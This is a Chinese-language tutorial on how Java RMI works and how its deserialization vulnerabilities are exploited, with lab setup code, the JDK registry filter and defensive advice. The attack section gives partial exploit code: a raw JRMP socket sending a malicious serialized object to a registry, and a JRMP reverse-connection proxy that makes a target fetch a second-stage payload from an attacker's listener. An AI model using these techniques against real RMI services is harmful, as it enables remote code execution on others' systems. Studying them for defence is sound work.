RMI 工作原理及反序列化漏洞分析<\/h1>

一、RMI 基础概念<\/h2>
RMI (Remote Method Invocation) 是 Java 提供的远程方法调用机制，它允许运行在一个 Java 虚拟机上的对象调用运行在另一个 Java 虚拟机上的对象的方法。RMI 的核心是通过 socket 编程、Java 序列化和反序列化、动态代理等技术实现的。<\/p>

RMI 核心组件<\/h3>

注册中心 (Registry)<\/strong>: 负责服务的注册和查找<\/li>
服务端 (Server)<\/strong>: 提供远程服务实现<\/li>

客户端 (Client)<\/strong>: 调用远程服务<\/li> <\/ul>
二、RMI 通信流程分析<\/h2>
1. 注册中心启动流程<\/h3>
Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span> <\/span><\/span><\/code><\/pre>关键类调用链：<\/p> LocateRegistry.createRegistry()<\/code><\/li> RegistryImpl.class<\/code> 创建<\/li> UnicastServerRef.class<\/code> 初始化<\/li> LiveRef.class<\/code> 存储 ObjID 和 TCPEndpoint<\/li> TCPTransport.class<\/code> 创建 ServerSocket 监听端口<\/li> <\/ol> 核心处理在 TCPTransport$AcceptLoop<\/code> 线程中，不断接受连接并交给 ConnectionHandler<\/code> 处理。<\/p> 2. 服务端注册服务流程<\/h3> Registry registry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span> 1099<\/span>);<\/span> <\/span><\/span>ServiceImpl service =<\/span> new<\/span> ServiceImpl();<\/span> <\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"vince"<\/span>,<\/span> service);<\/span> <\/span><\/span><\/code><\/pre>关键步骤：<\/p> 通过 LocateRegistry.getRegistry()<\/code> 获取 Registry 代理对象 (RegistryImpl_Stub)<\/li> 调用 bind()<\/code> 方法时：创建 socket 连接注册中心<\/li> 写入传输头信息 (Int:1246907721, Short:2)<\/li> 写入方法调用信息 (方法编号、参数等)<\/li> 注册中心反序列化参数并处理<\/li> <\/ul> <\/li> <\/ol> 3. 客户端调用流程<\/h3> Registry registry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span> 1099<\/span>);<\/span> <\/span><\/span>IService service =<\/span> (<\/span>IService)<\/span> registry.<\/span>lookup<\/span>(<\/span>"vince"<\/span>);<\/span> <\/span><\/span>String result =<\/span> service.<\/span>queryName<\/span>(<\/span>"jack"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>关键步骤：<\/p> 通过 lookup()<\/code> 获取远程服务代理<\/li> 调用方法时：新建 socket 连接服务端<\/li> 写入方法调用信息 (Int:-1, Long:方法hash)<\/li> 服务端通过反射执行本地方法并返回结果<\/li> <\/ul> <\/li> <\/ol> 三、RMI 反序列化漏洞分析<\/h2> 1. 漏洞原理<\/h3> RMI 通信过程中，所有参数和返回值都通过 Java 序列化\/反序列化传输。攻击者可以构造恶意序列化数据，在反序列化时触发远程代码执行。<\/p> 关键反序列化点：<\/p> 注册中心处理 bind()<\/code>、lookup()<\/code> 等方法时<\/li> 服务端处理远程方法调用时<\/li> 客户端接收返回值时<\/li> <\/ol> 2. 漏洞利用方式<\/h3> 方式一：直接攻击注册中心<\/h4> 构造恶意序列化数据发送给注册中心：<\/p> Socket socket =<\/span> new<\/span> Socket(<\/span>"127.0.0.1"<\/span>,<\/span> 1099<\/span>);<\/span> <\/span><\/span>DataOutputStream dos =<\/span> new<\/span> DataOutputStream(<\/span>socket.<\/span>getOutputStream<\/span>());<\/span> <\/span><\/span>dos.<\/span>writeInt<\/span>(<\/span>1246907721<\/span>);<\/span> <\/span><\/span>dos.<\/span>writeShort<\/span>(<\/span>2<\/span>);<\/span> <\/span><\/span>dos.<\/span>writeByte<\/span>(<\/span>75<\/span>);<\/span> <\/span><\/span>dos.<\/span>flush<\/span>();<\/span> <\/span><\/span>\/\/ ... 构造恶意序列化数据 ... <\/span><\/span><\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>generatePayload());<\/span> \/\/ 写入恶意对象 <\/span><\/span><\/span><\/code><\/pre>方式二：JRMP 反向连接<\/h4> 当目标存在反序列化防御时，可以利用 JRMP 反向连接绕过：<\/p> 攻击者开启 JRMPListener 服务<\/li> 向目标发送 RemoteObjectInvocationHandler<\/code> 序列化对象<\/li> 目标反序列化后会连接攻击者的 JRMPListener<\/li> 攻击者发送二次攻击载荷<\/li> <\/ol> \/\/ 攻击者 JRMPListener <\/span><\/span><\/span><\/span>ServerSocket ss =<\/span> new<\/span> ServerSocket(<\/span>8899<\/span>);<\/span> <\/span><\/span>Socket s =<\/span> ss.<\/span>accept<\/span>();<\/span> <\/span><\/span>\/\/ ... 处理连接并发送payload ... <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 发送给目标的恶意对象 <\/span><\/span><\/span><\/span>public<\/span> static<\/span> Remote generate<\/span>(){<\/span> <\/span><\/span> ObjID oi =<\/span> new<\/span> ObjID(<\/span>0<\/span>);<\/span> <\/span><\/span> TCPEndpoint te =<\/span> new<\/span> TCPEndpoint(<\/span>"127.0.0.1"<\/span>,<\/span> 8899<\/span>);<\/span> <\/span><\/span> LiveRef lr =<\/span> new<\/span> LiveRef(<\/span>oi,<\/span> te,<\/span> false<\/span>);<\/span> <\/span><\/span> UnicastRef us =<\/span> new<\/span> UnicastRef(<\/span>lr);<\/span> <\/span><\/span> RemoteObjectInvocationHandler roih =<\/span> new<\/span> RemoteObjectInvocationHandler(<\/span>us);<\/span> <\/span><\/span> Remote rm =<\/span> (<\/span>Remote)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>Client.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Remote.<\/span>class<\/span>},<\/span> roih);<\/span> <\/span><\/span> return<\/span> rm;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. JDK 防御机制<\/h3> 从 JDK 8u121 开始引入了白名单机制，在反序列化时会调用 registryFilter<\/code> 方法检查类是否允许：<\/p> \/\/ sun.rmi.registry.RegistryImpl <\/span><\/span><\/span><\/span>private<\/span> static<\/span> Status registryFilter<\/span>(<\/span>FilterInfo var0)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>var0.<\/span>depth<\/span>()<\/span> ><\/span> 20L<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> Status.<\/span>REJECTED<\/span>;<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> String var1 =<\/span> var0.<\/span>serialClass<\/span>().<\/span>getName<\/span>();<\/span> <\/span><\/span> if<\/span> (<\/span>var1.<\/span>startsWith<\/span>(<\/span>"java.rmi.server"<\/span>)<\/span> ||<\/span> <\/span><\/span> var1.<\/span>startsWith<\/span>(<\/span>"[Ljava.rmi.server"<\/span>)<\/span> ||<\/span> <\/span><\/span> var1.<\/span>equals<\/span>(<\/span>"java.util.Arrays$ArrayList"<\/span>))<\/span> {<\/span> <\/span><\/span> return<\/span> Status.<\/span>ALLOWED<\/span>;<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> return<\/span> var0.<\/span>serialClass<\/span>().<\/span>isArray<\/span>()<\/span> ?<\/span> Status.<\/span>UNDECIDED<\/span> :<\/span> Status.<\/span>REJECTED<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>四、漏洞防御建议<\/h2> 升级 JDK 到最新版本<\/li> 对 RMI 服务进行网络隔离<\/li> 使用安全管理器配置严格的权限<\/li> 替换 Java 默认的序列化机制<\/li> 对 RMI 端口进行访问控制<\/li> <\/ol> 五、实验环境搭建<\/h2> 1. 基础 RMI 服务搭建<\/h3> 远程接口定义<\/strong>:<\/p> public<\/span> interface<\/span> IService<\/span> extends<\/span> Remote {<\/span> <\/span><\/span> public<\/span> String queryName<\/span>(<\/span>String no)<\/span> throws<\/span> RemoteException;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>服务实现<\/strong>:<\/p> public<\/span> class<\/span> ServiceImpl<\/span> extends<\/span> UnicastRemoteObject implements<\/span> IService {<\/span> <\/span><\/span> public<\/span> ServiceImpl<\/span>()<\/span> throws<\/span> RemoteException {}<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> String queryName<\/span>(<\/span>String no)<\/span> throws<\/span> RemoteException {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"hello "<\/span> +<\/span> no);<\/span> <\/span><\/span> return<\/span> String.<\/span>valueOf<\/span>(<\/span>System.<\/span>currentTimeMillis<\/span>());<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>注册中心<\/strong>:<\/p> public<\/span> class<\/span> register<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> Registry registry =<\/span> null<\/span>;<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>RemoteException e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> while<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>服务端<\/strong>:<\/p> public<\/span> class<\/span> Server<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> Registry registry =<\/span> null<\/span>;<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> registry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span> 1099<\/span>);<\/span> <\/span><\/span> ServiceImpl service =<\/span> new<\/span> ServiceImpl();<\/span> <\/span><\/span> registry.<\/span>bind<\/span>(<\/span>"vince"<\/span>,<\/span> service);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>客户端<\/strong>:<\/p> public<\/span> class<\/span> Client<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> Registry registry =<\/span> null<\/span>;<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> registry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span> 1099<\/span>);<\/span> <\/span><\/span> IService service =<\/span> (<\/span>IService)<\/span> registry.<\/span>lookup<\/span>(<\/span>"vince"<\/span>);<\/span> <\/span><\/span> String result =<\/span> service.<\/span>queryName<\/span>(<\/span>"jack"<\/span>);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"result from remote : "<\/span> +<\/span> result);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>六、总结<\/h2> RMI 反序列化漏洞是 Java 安全中的一个重要攻击面，攻击者可以通过精心构造的序列化数据在目标系统上执行任意代码。理解 RMI 的通信机制和序列化过程对于防御此类攻击至关重要。在实际应用中，应当采取多层次的防御措施，包括及时更新补丁、限制网络访问、使用安全配置等。<\/p>